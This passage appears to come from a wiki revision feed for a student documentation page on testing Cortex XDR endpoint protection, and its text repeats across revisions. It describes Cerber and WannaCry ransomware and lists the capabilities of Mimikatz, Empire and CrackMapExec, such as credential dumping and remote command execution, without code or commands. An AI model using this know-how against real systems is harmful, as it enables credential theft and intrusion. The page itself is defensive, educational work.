Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
=== Cerber Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
=== WannaCry Ransomware ===&lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
== Tools ==&lt;br /&gt;
&lt;br /&gt;
=== Cortex XDR ===&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
=== Mimikatz ===&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
=== BC-Security / Empire ===&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Porchetta-Industries / CrackMapExec ===&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
==Pentesting With Cortex XDR ==&lt;br /&gt;
&lt;br /&gt;
=== Installation ===&lt;br /&gt;
&lt;br /&gt;
# From Cortex XDR, select Endpoints → Agent Installations.&lt;br /&gt;
# Create a new installation package.&lt;br /&gt;
# Enter a unique Name and an optional Description to identify the installation package.&lt;br /&gt;
# Select the Package Type.&lt;br /&gt;
&lt;br /&gt;
#*Standalone Installers—Use for fresh installations and to Upgrade Cortex XDR Agents on a registered endpoint that is connected to Cortex XDR.&lt;br /&gt;
&lt;br /&gt;
#*Upgrade from ESM—Use this package to upgrade Traps agents which connect to the on-premises Traps Endpoint Security Manager to Cortex XDR. For more information, see Migrate from Traps Endpoint Security Manager.&lt;br /&gt;
&lt;br /&gt;
#*(Linux only) Kubernetes Installer—Use for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
#*Helm Installer—Use this package for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
# Specify the installation package settings.&lt;br /&gt;
# Create the installation package.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR prepares your installation package and makes it available on the Agent Installations page.&lt;br /&gt;
# Download your installation package.&lt;br /&gt;
&lt;br /&gt;
When the status of the package shows Completed, right-click the agent version, and click Download.&lt;br /&gt;
#*For Windows endpoints, select between the architecture type. You can download the installer msi file only, or for Cortex XDR agents 7.4 and later, a distribution package that includes both the installer msi file and the latest content zip. The distribution package is recommended to reduce the network load and time typically required for the initial roll-out or major upgrades of the Cortex XDR agent. To understand the benefits, workflow, and requirements to support this type of deployment, refer to the Cortex XDR Agent Administrator Guide.&lt;br /&gt;
&lt;br /&gt;
#*For macOS endpoints, download the ZIP installation folder and upload it to the endpoint. To deploy the Cortex XDR agent using JAMF, upload the ZIP folder to JAMF. Alternatively, to install the agent manually on the endpoint, unzip the ZIP folder and double-click the pkg file.&lt;br /&gt;
&lt;br /&gt;
#*For Linux endpoints, you can download .rpm or .deb installers (according to the endpoint Linux distribution), and deploy the installers on the endpoints using the Linux package manager. Alternatively, you can download a Shell installer and deploy it manually on the endpoint.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
HP Notebook&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Results ==&lt;br /&gt;
&lt;br /&gt;
Cortex XDR was able to prevent all attacks including the real ransomware execution mentioned in the &amp;quot;Ransomware&amp;quot; section. We got a precise analysis of processes which were considered abnormal or malicious. Cortex XDR recognizes behaviour related to known exploits which is then reported and blocked immediately.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
*https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/7.9/Cortex-XDR-Agent-Administrator-Guide&lt;br /&gt;
*https://github.com/gentilkiwi/mimikatz&lt;br /&gt;
*https://github.com/Porchetta-Industries/CrackMapExec&lt;br /&gt;
*https://github.com/BC-SECURITY/Empire&lt;br /&gt;
*https://www.avast.com/de-de/c-cerber#:~:text=Link%20kopiert-,Was%20ist%20die%20Cerber%20Ransomware%3F,Sie%20wird%20eine%20L%C3%B6segeldzahlung%20verlangt.&lt;br /&gt;
*https://de.wikipedia.org/wiki/WannaCry&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11464</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11464"/>
		<updated>2023-02-03T16:46:53Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Pentesting With Cortex XDR */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization&#039;s endpoint infrastructure.&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting can include a variety of different techniques and tools, such as:&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanning: Identifying known vulnerabilities on endpoint devices&lt;br /&gt;
* Social engineering: Attempting to trick users into providing sensitive information or executing malicious code&lt;br /&gt;
* Application testing: Identifying vulnerabilities in software installed on endpoint devices&lt;br /&gt;
* Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means&lt;br /&gt;
* Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices&lt;br /&gt;
&lt;br /&gt;
The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
=== Cerber Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
=== WannaCry Ransomware ===&lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
WannaCry caused significant damage and disruption to organizations worldwide, and it was estimated that the total cost of the attack exceeded $4 billion. Microsoft had released a patch for the vulnerability before the outbreak, but many systems had not yet been updated, highlighting the importance of keeping software up to date.&lt;br /&gt;
&lt;br /&gt;
== Tools ==&lt;br /&gt;
&lt;br /&gt;
=== Cortex XDR ===&lt;br /&gt;
&lt;br /&gt;
Cortex XDR is a security solution developed by Palo Alto Networks that provides advanced threat detection and response capabilities. It combines multiple security technologies, including endpoint protection, network security, and cloud-based threat intelligence, to provide a comprehensive view of an organization&#039;s security posture.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses machine learning and behavioral analytics to detect and respond to advanced threats, such as ransomware and APTs (Advanced Persistent Threats), in real-time. The platform also allows for automated incident response, which enables security teams to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR also integrates with other security solutions, such as firewalls, to provide a unified view of security across an organization&#039;s entire infrastructure. This allows security teams to quickly identify and respond to threats, even if they are spread across multiple systems and networks.&lt;br /&gt;
&lt;br /&gt;
The Cortex XDR platform also includes a cloud-based management console, which enables security teams to monitor and manage security across multiple locations and devices. It allows security teams to identify, investigate and respond to security incidents across all users, devices, and networks with a single console.&lt;br /&gt;
&lt;br /&gt;
=== Mimikatz ===&lt;br /&gt;
&lt;br /&gt;
Mimikatz is a tool that is used to extract sensitive information, such as login credentials, from Windows systems. The tool is often used by attackers to gain access to systems and networks after they have successfully compromised a system. Mimikatz is able to extract information from the Windows operating system&#039;s memory, and it can be used to extract credentials from a wide range of applications, including web browsers, email clients, and other software.&lt;br /&gt;
&lt;br /&gt;
Mimikatz can extract a variety of information, including:&lt;br /&gt;
&lt;br /&gt;
* Passwords stored in memory&lt;br /&gt;
* Encryption keys&lt;br /&gt;
* Hashes of passwords&lt;br /&gt;
* Kerberos tickets&lt;br /&gt;
* Credentials for services and scheduled tasks&lt;br /&gt;
&lt;br /&gt;
Mimikatz can also be used to perform actions such as:&lt;br /&gt;
&lt;br /&gt;
* Changing a password for a user account&lt;br /&gt;
* Adding new user account&lt;br /&gt;
* Dumping the LSASS process memory.&lt;br /&gt;
&lt;br /&gt;
Mimikatz is considered a powerful and dangerous tool, and its use in an unauthorized manner is illegal in some countries. It is important for organizations to be aware of the presence of Mimikatz and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
=== BC-Security / Empire ===&lt;br /&gt;
&lt;br /&gt;
Empire is a post-exploitation framework, often used by penetration testers and red teamers to perform various tasks on a compromised system. Empire is based on the PowerShell scripting language and it is a popular tool among attackers because of its ability to execute arbitrary PowerShell commands and scripts, and its ability to perform various post-exploitation tasks such as privilege escalation, key logging, and network reconnaissance.&lt;br /&gt;
&lt;br /&gt;
Empire is a modular framework that allows users to easily create and execute custom modules, making it a powerful and flexible tool. Empire also has the ability to communicate with a command and control (C2) server, which can be used to remotely control a compromised system.&lt;br /&gt;
&lt;br /&gt;
Empire is often used in combination with other tools such as Metasploit, Mimikatz, and Cobalt Strike to perform advanced attacks.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to be aware of the presence of Empire and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Porchetta-Industries / CrackMapExec ===&lt;br /&gt;
&lt;br /&gt;
CrackMapExec (CME) is a tool that is used to perform network reconnaissance and attack execution. It is often used by penetration testers and red teamers to enumerate and attack Windows-based systems on a network. CME is based on the SMB (Server Message Block) protocol, which is used to provide shared access to files, printers, and other resources on a network.&lt;br /&gt;
&lt;br /&gt;
CME can perform various tasks, including:&lt;br /&gt;
&lt;br /&gt;
Enumerating users, groups, and computers on a network&lt;br /&gt;
Dumping password hashes for offline cracking&lt;br /&gt;
Executing arbitrary commands or scripts on remote systems&lt;br /&gt;
Attempting to authenticate to remote systems using a list of provided credentials&lt;br /&gt;
CME is a powerful and fast tool, which can be used to quickly gather information about systems on a network. It is important for organizations to be aware of the presence of CME and other similar tools on their systems, and to take steps to protect against their use. This can include regularly monitoring systems for suspicious activity, implementing strong access controls, and regularly updating software to patch known vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using CME or any other tool that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
==Pentesting With Cortex XDR ==&lt;br /&gt;
&lt;br /&gt;
# From Cortex XDR, select Endpoints → Agent Installations.&lt;br /&gt;
# Create a new installation package.&lt;br /&gt;
# Enter a unique Name and an optional Description to identify the installation package.&lt;br /&gt;
# Select the Package Type.&lt;br /&gt;
&lt;br /&gt;
*Standalone Installers—Use for fresh installations and to Upgrade Cortex XDR Agents on a registered endpoint that is connected to Cortex XDR.&lt;br /&gt;
&lt;br /&gt;
*Upgrade from ESM—Use this package to upgrade Traps agents which connect to the on-premises Traps Endpoint Security Manager to Cortex XDR. For more information, see Migrate from Traps Endpoint Security Manager.&lt;br /&gt;
&lt;br /&gt;
*(Linux only) Kubernetes Installer—Use for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
*Helm Installer—Use this package for fresh installations and upgrades of Cortex XDR agents running on Kubernetes clusters.&lt;br /&gt;
&lt;br /&gt;
# Specify the installation package settings.&lt;br /&gt;
# Create the installation package.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR prepares your installation package and makes it available on the Agent Installations page.&lt;br /&gt;
# Download your installation package.&lt;br /&gt;
&lt;br /&gt;
When the status of the package shows Completed, right-click the agent version, and click Download.&lt;br /&gt;
*For Windows endpoints, select between the architecture type. You can download the installer msi file only, or for Cortex XDR agents 7.4 and later, a distribution package that includes both the installer msi file and the latest content zip. The distribution package is recommended to reduce the network load and time typically required for the initial roll-out or major upgrades of the Cortex XDR agent. To understand the benefits, workflow, and requirements to support this type of deployment, refer to the Cortex XDR Agent Administrator Guide.&lt;br /&gt;
&lt;br /&gt;
*For macOS endpoints, download the ZIP installation folder and upload it to the endpoint. To deploy the Cortex XDR agent using JAMF, upload the ZIP folder to JAMF. Alternatively, to install the agent manually on the endpoint, unzip the ZIP folder and double-click the pkg file.&lt;br /&gt;
&lt;br /&gt;
*For Linux endpoints, you can download .rpm or .deb installers (according to the endpoint Linux distribution), and deploy the installers on the endpoints using the Linux package manager. Alternatively, you can download a Shell installer and deploy it manually on the endpoint.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
HP Notebook&lt;br /&gt;
&lt;br /&gt;
== Used Software ==&lt;br /&gt;
&lt;br /&gt;
* Cortex XDR&lt;br /&gt;
* WannaCry Ransomware&lt;br /&gt;
* Cerber Ransomware&lt;br /&gt;
* Gentilkiwi / Mimikatz &lt;br /&gt;
* BC-Security / Empire &lt;br /&gt;
* Porchetta-Industries / CrackMapExec&lt;br /&gt;
&lt;br /&gt;
== Results ==&lt;br /&gt;
&lt;br /&gt;
Cortex XDR was able to prevent all attacks including the real ransomware execution mentioned in the &amp;quot;Ransomware&amp;quot; section. We got a precise analysis of processes which were considered abnormal or malicious. Cortex XDR recognizes behaviour related to known exploits which is then reported and blocked immediately.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
*https://docs-cortex.paloaltonetworks.com/r/Cortex-XDR/7.9/Cortex-XDR-Agent-Administrator-Guide&lt;br /&gt;
*https://github.com/gentilkiwi/mimikatz&lt;br /&gt;
*https://github.com/Porchetta-Industries/CrackMapExec&lt;br /&gt;
*https://github.com/BC-SECURITY/Empire&lt;br /&gt;
*https://www.avast.com/de-de/c-cerber#:~:text=Link%20kopiert-,Was%20ist%20die%20Cerber%20Ransomware%3F,Sie%20wird%20eine%20L%C3%B6segeldzahlung%20verlangt.&lt;br /&gt;
*https://de.wikipedia.org/wiki/WannaCry&lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11462</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11462"/>
		<updated>2023-02-03T16:45:21Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Pentesting With Cortex XDR */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting is a process of testing the security of endpoint devices, such as laptops, desktops, and servers, to identify vulnerabilities and assess the overall security of an organization&#039;s endpoint infrastructure.&lt;br /&gt;
&lt;br /&gt;
Endpoint security pentesting can include a variety of different techniques and tools, such as:&lt;br /&gt;
&lt;br /&gt;
* Vulnerability scanning: Identifying known vulnerabilities on endpoint devices&lt;br /&gt;
* Social engineering: Attempting to trick users into providing sensitive information or executing malicious code&lt;br /&gt;
* Application testing: Identifying vulnerabilities in software installed on endpoint devices&lt;br /&gt;
* Physical security testing: Attempting to gain unauthorized access to endpoint devices through physical means&lt;br /&gt;
* Network testing: Identifying vulnerabilities in the network infrastructure that could be used to compromise endpoint devices&lt;br /&gt;
&lt;br /&gt;
The goal of endpoint security pentesting is to identify and prioritize vulnerabilities, so that they can be remediated before they are exploited by attackers. This can include providing recommendations for mitigating vulnerabilities, as well as recommendations for improving overall security practices.&lt;br /&gt;
&lt;br /&gt;
It is important for organizations to regularly perform endpoint security pentesting to ensure that their endpoint infrastructure is secure. The results of the pentest can be used to improve the security posture of the organization and to prioritize security investments.&lt;br /&gt;
&lt;br /&gt;
It is important to note that using any tool or method that attempts to gain unauthorized access to systems is illegal in many countries and should only be used with explicit permission from the owner of the system.&lt;br /&gt;
&lt;br /&gt;
== Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that encrypts a victim&#039;s files and demands a ransom payment in exchange for the decryption key. The payment is typically demanded in the form of cryptocurrency, such as Bitcoin, and is often accompanied by a deadline for payment. Ransomware is typically spread through phishing emails or by exploiting vulnerabilities in software. It can cause significant financial and operational damage to individuals and organizations.&lt;br /&gt;
&lt;br /&gt;
Ransomware attacks can be particularly damaging to businesses, as they can disrupt operations and result in the loss of important data. In some cases, the ransom may be too high for the organization to afford, and they may be forced to pay it. In other cases, the organization may choose to not pay the ransom and instead restore their systems from backups or try to decrypt the files using other methods. Some Ransomware also have a double extortion mechanism, where they also steal data from the organization and threaten to release it publicly if the ransom is not paid. It is important for individuals and organizations to regularly backup their data and to keep their software and systems up to date to reduce the risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
=== Cerber Ransomware ===&lt;br /&gt;
&lt;br /&gt;
Cerber is a type of ransomware that was first discovered in 2016. It is known for its use of advanced tactics to evade detection and to spread to other computers on a network. One of the tactics is the use of exploit kits to take advantage of vulnerabilities in software. It also uses a double extortion mechanism, where it steal data from the organization and threaten to release it publicly if the ransom is not paid.&lt;br /&gt;
Cerber is typically distributed through spam emails or via malicious websites that exploit vulnerabilities in web browsers and other software. Once a computer is infected, the malware encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files.&lt;br /&gt;
It is important to note that paying the ransom does not guarantee the recovery of the encrypted files and it is advisable to try to restore the data from backups or other means.&lt;br /&gt;
&lt;br /&gt;
=== WannaCry Ransomware ===&lt;br /&gt;
&lt;br /&gt;
WannaCry is a type of ransomware that was first discovered in May 2017. It quickly spread globally, causing widespread disruption to businesses, hospitals and other organizations. WannaCry was notable for its use of a specific exploit called EternalBlue, which was developed by the US National Security Agency (NSA) and leaked to the public by a hacking group called the Shadow Brokers. The exploit targeted a vulnerability in Microsoft Windows operating systems, allowing the ransomware to spread rapidly across networks.&lt;br /&gt;
Once a computer was infected, WannaCry encrypts files on the computer and on any connected network drives, making them inaccessible to the victim. A ransom note is then displayed, instructing the victim to pay a ransom in order to regain access to the encrypted files. The ransom payment was demanded in Bitcoin and the attackers threatened to double the ransom if it was not paid within three days.&lt;br /&gt;
